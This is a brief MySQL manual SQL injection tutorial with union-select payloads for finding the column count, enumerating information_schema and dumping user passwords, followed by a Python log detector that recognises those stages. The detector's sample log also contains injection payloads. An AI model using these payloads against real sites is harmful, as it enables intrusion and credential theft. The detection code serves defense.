1. Generally, use ', ") or similar characters to close the original value, then use %23 (the URL-encoded #) to comment out the rest of the statement.
2. To find the database, first use ORDER BY n to guess the number of fields, then use UNION SELECT ... n%23 to query.
union select 1,2,database()%23
3. Use the TABLES table in the information_schema database to look up the first table in the mysql database.
select table_name from information_schema.tables where table_schema='mysql' limit 0,1;
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23
4. Use the COLUMNS table in the information_schema database to look up the first column name of the user table in the mysql database.
select column_name from information_schema.columns where table_schema='mysql' and table_name='user' limit 0,1;
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'%23
5. Once the database name, table name and column names are known, query the data directly.
union select 1,group_concat(username),group_concat(password) from users%23
MySQL Manual injection steps
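
Added example (not part of the original page): a small detector that maps requests in a web access log to the stages listed above, so each step can be recognised from the defending side. The log lines, the /item and /search paths and the rule names are constructed for illustration; the normalisation covers the mixed case and the "function (" spacing seen in the statements above.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Stage name -> pattern, matched against the normalized query string.
RULES = {
    "column_count_probe": re.compile(r"\border by \d+"),
    "union_select": re.compile(r"\bunion (?:all )?select\b"),
    "schema_enumeration": re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "data_aggregation": re.compile(r"\b(?:group_concat|database)\("),
    # A trailing # only counts when a quote was closed earlier ("q=c#" is benign).
    "trailing_comment": re.compile(r"['\"].*(?:#|--)\s*$"),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=1%27+order+by+4%23 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /item?id=-1%27+union+select+1,2,database%20()%23 HTTP/1.1" 200 530',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /item?id=-1%27+Union+SELECT+1,2,GROUP_CONCAT+(table_name)+from+Information_schema.tables+where+table_schema=%27security%27%23 HTTP/1.1" 200 611',
    '192.0.2.15 - - [01/Jan/2024:10:01:00 +0000] "GET /search?q=order+by+phone HTTP/1.1" 200 980',
    '192.0.2.15 - - [01/Jan/2024:10:01:03 +0000] "GET /search?q=c%23 HTTP/1.1" 200 1024',
]

def normalize(raw_query):
    """URL-decode, lowercase, collapse whitespace, join 'func (' into 'func('."""
    text = unquote_plus(raw_query).lower()
    text = re.sub(r"\s+", " ", text).strip()
    return re.sub(r"\s+\(", "(", text)

def stages(raw_query):
    """Return the names of all rules that match one raw query string."""
    text = normalize(raw_query)
    return [name for name, rx in RULES.items() if rx.search(text)]

def scan(lines):
    """Map line index -> matched stages for every request with at least one hit."""
    hits = {}
    for n, line in enumerate(lines):
        m = REQUEST.search(line)
        if not m:
            continue
        found = stages(urlsplit(m.group(1)).query)
        if found:
            hits[n] = found
    return hits

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(n, ", ".join(found))
```

Requests from one client that move from column_count_probe to union_select to schema_enumeration within a short window are a much stronger signal than any single rule on its own.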